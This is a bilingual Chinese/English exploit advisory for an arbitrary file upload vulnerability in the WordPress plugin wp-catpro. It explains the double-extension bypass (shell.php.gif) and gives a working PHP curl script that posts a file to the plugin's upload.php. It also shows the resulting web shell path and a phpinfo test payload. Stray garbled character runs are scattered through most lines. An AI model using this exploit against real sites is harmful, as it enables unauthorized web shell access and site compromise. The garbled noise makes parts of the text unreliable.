WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
; Y4 B; I, C3 D: X#-----------------------------------------------------------------------
- a1 c! X. I6 Q+ `; L4 i/ G
1 E3 I2 v& s5 |; N作者  => Zikou-16
邮箱 => [email protected]
: T- ?+ p6 i* p( l测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
0 t. j& q1 q, v6 i4 Z9 ?------------------
) Z+ W. l# M+ Y, q  D5 M# 攻击者可以上传 file/shell.php.gif
* J. Q3 Q3 n2 g! ^6 P9 I5 V# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
2 @1 f3 x$ W! t* P" M9 E# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
  q  g9 l  o" }; H------------------
# ]* {& n# V4 l* x% J' o
! H8 `* ^3 e' R* F#=> Exploit
-----------
. @' s% q1 O% s+ L0 `: c<?php

8 x! h! e7 k! V+ I- `& A$uploadfile="zik.php.gif";
0 ?0 h3 b& ?' |" q$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
5 M( g' g; ?. o1 X4 \curl_setopt($ch, CURLOPT_POST, true);
4 x. j* f* {7 I/ y7 q- qcurl_setopt($ch, CURLOPT_POSTFIELDS,
( Q6 e# ]3 Z1 s* O( g) L8 k* ^array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
4 B" d8 d8 o- y8 @: Hcurl_close($ch);
3 ~1 L4 V4 W1 M. Z+ {
print "$postResult";
& a5 R; ~& ^' S1 ]
2 Q+ K4 q! E5 I$ i6 X  YShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
9 h1 B6 ~" \" X  ?>
; b6 x% V' U& k' m4 j# m<?php
9 s9 f$ ]- |  E; ]1 Tphpinfo();
?>